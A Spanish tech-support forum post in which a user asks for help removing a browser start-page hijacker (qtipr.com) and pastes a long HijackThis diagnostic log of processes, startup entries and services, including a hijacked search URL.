• Registrarse
  • Iniciar sesión


  • Resultados 1 al 9 de 9

    Eliminar qtipr.com (Solucionado)

    Saludos. Llevo días con un molesto malware o lo que sea que me secuestra la página de inicio del navegador cada vez que entro y me lleva a la página www.qtipr.com . Ya he pasado ...

          
    1. #1
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Malware Eliminar qtipr.com (Solucionado)

      Saludos. Llevo días con un molesto malware o lo que sea que me secuestra la página de inicio del navegador cada vez que entro y me lleva a la página www.qtipr.com . Ya he pasado el malwarebytes y el adwcleaner pero a pesar de que encuentran cosas, nunca consiguen quitarme el problema del todo. Qué debo hacer? muchas gracias.

      Este es el log que me dio el Hijackthis :

      Logfile of Trend Micro HijackThis v2.0.5
      Scan saved at 22:07:03, on 16/02/2017
      Platform: Unknown Windows (WinNT 6.02.1008)
      MSIE: Internet Explorer v11.0 (11.00.9600.18123)


      Boot mode: Normal

      Running processes:
      C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
      C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE
      C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
      C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
      C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
      C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
      C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\CCLibrary.exe
      C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\libs\node.exe
      C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
      C:\Users\Alberto\Desktop\HijackThis.exe

      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = Google
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = Google
      R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Google
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
      R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = Google
      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = Rambler/search
      R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = Rambler/search
      R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
      R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
      R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
      O2 - BHO: Skype for Business Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O2 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL
      O4 - HKLM\..\Run: [UpdateP2GShortCut] "C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\5.0"
      O4 - HKLM\..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
      O4 - HKLM\..\Run: [AdobeCS6ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
      O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
      O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
      O4 - HKLM\..\Run: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
      O4 - HKCU\..\Run: [Power2GoExpress] NA
      O4 - HKCU\..\Run: [HP ENVY 4500 series (NET)] "C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN55Q341TN05X4:NW" -scfn "HP ENVY 4500 series (NET)" -AutoStart 1
      O4 - HKCU\..\Run: [Chromium] "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      O4 - HKCU\..\Run: [TalkHelper] "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart
      O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
      O4 - HKCU\..\RunOnce: [Application Restart #2] C:\Users\Alberto\AppData\Local\Pokki\Engine\HostAppService.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-client-side-phishing-detection --enable-file-cookies --disable-sync --disable-breakpad --disable-bundled-ppapi-flash --disable-sync-tabs --disable-speech-input --disable-custom-jumplist --process-per-tab --debug-devtools-frontend="C:\Users\Alberto\AppData\Local\Pokki\Engine\inspector" --no-first-run --lang=en-US --disable-component-update --disable-prompt-on-repost --no-startup-window --disable-translate --disable-logging --disable-desktop-notifications --disable-gpu-process-prelaunch --flag-switches-begin --flag-switches-end --restore-last-session
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [AdobeBridge] (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [Power2GoExpress] NA (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [HP ENVY 4500 series (NET)] "C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN55Q341TN05X4:NW" -scfn "HP ENVY 4500 series (NET)" -AutoStart 1 (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [Chromium] "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [TalkHelper] "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (User '?')
      O4 - HKUS\S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480\..\RunOnce: [Application Restart #2] C:\Users\Alberto\AppData\Local\Pokki\Engine\HostAppService.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-client-side-phishing-detection --enable-file-cookies --disable-sync --disable-breakpad --disable-bundled-ppapi-flash --disable-sync-tabs --disable-speech-input --disable-custom-jumplist --process-per-tab --debug-devtools-frontend="C:\Users\Alberto\AppData\Local\Pokki\Engine\inspector" --no-first-run --lang=en-US --disable-component-update --disable-prompt-on-repost --no-startup-window --disable-translate --disable-logging --disable-desktop-notifications --disable-gpu-process-prelaunch --flag-switches-begin --flag-switches-end --restore-last-session (User '?')
      O4 - S-1-5-21-1830392043-3884525579-1098650476-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02162017215027480 Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (User '?')
      O4 - Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
      O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
      O8 - Extra context menu item: Se&nd to OneNote - res://C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
      O9 - Extra button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe
      O9 - Extra 'Tools' menuitem: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe
      O9 - Extra button: Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
      O9 - Extra 'Tools' menuitem: &Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
      O9 - Extra button: Complemento Hacer clic para llamar de Lync - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O9 - Extra 'Tools' menuitem: Complemento Hacer clic para llamar de Lync - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
      O9 - Extra button: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
      O9 - Extra 'Tools' menuitem: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
      O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
      O18 - Protocol: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
      O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
      O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
      O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
      O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      O23 - Service: AdobeUpdateService - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
      O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
      O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
      O23 - Service: @%systemroot%\system32\appidsvc.dll,-100 (AppIDSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\appinfo.dll,-100 (Appinfo) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\AppReadiness.dll,-1000 (AppReadiness) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\appxdeploymentserver.dll,-1 (AppXSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\AudioEndpointBuilder.dll,-204 (AudioEndpointBuilder) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-200 (Audiosrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\AxInstSV.dll,-103 (AxInstSV) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\bdesvc.dll,-100 (BDESVC) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\bfe.dll,-1001 (BFE) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\qmgr.dll,-1000 (BITS) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%windir%\system32\bisrv.dll,-100 (BrokerInfrastructure) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\browser.dll,-100 (Browser) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: BTDevManager - Unknown owner - C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
      O23 - Service: @%SystemRoot%\System32\BthHFSrv.dll,-103 (BthHFSrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\bthserv.dll,-101 (bthserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\certprop.dll,-11 (CertPropSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
      O23 - Service: @%SystemRoot%\system32\cryptsvc.dll,-1001 (CryptSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @C:\WINDOWS\system32\CxAudMsg64.exe,-100 (CxAudMsg) - Unknown owner - C:\WINDOWS\system32\CxAudMsg64.exe (file missing)
      O23 - Service: @combase.dll,-5012 (DcomLaunch) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\defragsvc.dll,-101 (defragsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\das.dll,-100 (DeviceAssociationService) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-100 (DeviceInstall) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\dhcpcore.dll,-100 (Dhcp) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\UtcResources.dll,-3001 (DiagTrack) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\dnsapi.dll,-101 (Dnscache) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\dot3svc.dll,-1102 (dot3svc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\dps.dll,-500 (DPS) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\DeviceSetupManager.dll,-1000 (DsmSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\eapsvc.dll,-1 (Eaphost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
      O23 - Service: Elan Service (ETDService) - ELAN Microelectronics Corp. - C:\Program Files\Elantech\ETDService.exe
      O23 - Service: @%SystemRoot%\system32\wevtsvc.dll,-200 (EventLog) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @comres.dll,-2450 (EventSystem) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
      O23 - Service: @%systemroot%\system32\fdPHost.dll,-100 (fdPHost) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fdrespub.dll,-100 (FDResPub) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\fhsvc.dll,-101 (fhsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\FntCache.dll,-100 (FontCache) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Servicio de Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      O23 - Service: @%SystemRoot%\System32\hidserv.dll,-101 (hidserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\kmsvc.dll,-6 (hkmsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\ListSvc.dll,-100 (HomeGroupListener) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\provsvc.dll,-100 (HomeGroupProvider) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: HP Support Solutions Framework Service (HPSupportSolutionsFrameworkService) - HP Inc. - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
      O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
      O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\ikeext.dll,-501 (IKEEXT) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
      O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
      O23 - Service: @%SystemRoot%\system32\iphlpsvc.dll,-500 (iphlpsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
      O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @comres.dll,-2946 (KtmRm) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\srvsvc.dll,-100 (LanmanServer) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wkssvc.dll,-100 (LanmanWorkstation) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Lenovo System Agent Service - LENOVO INCORPORATED. - C:\Program Files\Lenovo\iMController\SystemAgentService.exe
      O23 - Service: @%SystemRoot%\System32\GeofenceMonitorService.dll,-1 (lfsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\lltdres.dll,-1 (lltdsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\lmhsvc.dll,-101 (lmhosts) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
      O23 - Service: @%windir%\system32\lsm.dll,-1001 (LSM) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
      O23 - Service: @%systemroot%\system32\mmcss.dll,-100 (MMCSS) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\FirewallAPI.dll,-23090 (MpsSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\iscsidsc.dll,-5000 (MSiSCSI) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\msimsg.dll,-27 (msiserver) - Unknown owner - C:\WINDOWS\system32\msiexec.exe
      O23 - Service: @%SystemRoot%\system32\qagentrt.dll,-6 (napagent) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ncasvc.dll,-3009 (NcaSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ncbservice.dll,-500 (NcbService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\NcdAutoSetup.dll,-100 (NcdAutoSetup) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\netman.dll,-109 (Netman) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\netprofmsvc.dll,-202 (netprofm) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\nlasvc.dll,-1 (NlaSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\nsisvc.dll,-200 (nsi) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\WINDOWS\system32\nvvsvc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8004 (p2pimsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\p2psvc.dll,-8006 (p2psvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pcasvc.dll,-1 (PcaSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\sysWow64\perfhost.exe,-2 (PerfHost) - Unknown owner - C:\WINDOWS\SysWow64\perfhost.exe
      O23 - Service: @%systemroot%\system32\pla.dll,-500 (pla) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-200 (PlugPlay) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pnrpauto.dll,-8002 (PNRPAutoReg) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8000 (PNRPsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\polstore.dll,-5010 (PolicyAgent) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\umpo.dll,-100 (Power) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll,-1 (PrintNotify) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\profsvc.dll,-300 (ProfSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\rasauto.dll,-200 (RasAuto) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%Systemroot%\system32\rasmans.dll,-200 (RasMan) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%windir%\system32\RpcEpMap.dll,-1001 (RpcEptMapper) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
      O23 - Service: @combase.dll,-5010 (RpcSs) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: Conexant SmartAudio service (SAService) - Conexant Systems, Inc. - C:\WINDOWS\system32\SAsrv.exe
      O23 - Service: @%SystemRoot%\System32\SCardSvr.dll,-1 (SCardSvr) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\ScDeviceEnum.dll,-100 (ScDeviceEnum) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\schedsvc.dll,-100 (Schedule) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\certprop.dll,-13 (SCPolicySvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\Sens.dll,-200 (SENS) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\sensrsvc.dll,-1000 (SensrSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\SessEnv.dll,-1026 (SessionEnv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\ipnathlp.dll,-106 (SharedAccess) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\shsvcs.dll,-12288 (ShellHWDetection) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
      O23 - Service: @%SystemRoot%\System32\smphost.dll,-102 (smphost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
      O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
      O23 - Service: @%systemroot%\system32\ssdpsrv.dll,-100 (SSDPSRV) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\sstpsvc.dll,-200 (SstpSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wiaservc.dll,-9 (stisvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\StorSvc.dll,-100 (StorSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\svsvc.dll,-101 (svsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
      O23 - Service: @%SystemRoot%\System32\swprv.dll,-103 (swprv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\sysmain.dll,-1000 (SysMain) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%windir%\system32\SystemEventsBrokerServer.dll,-1001 (SystemEventsBroker) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\TabSvc.dll,-100 (TabletInputService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\tapisrv.dll,-10100 (TapiSrv) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\termsrv.dll,-268 (TermService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\themeservice.dll,-8192 (Themes) - Unknown owner - C:\WINDOWS\System32\svchost.exe
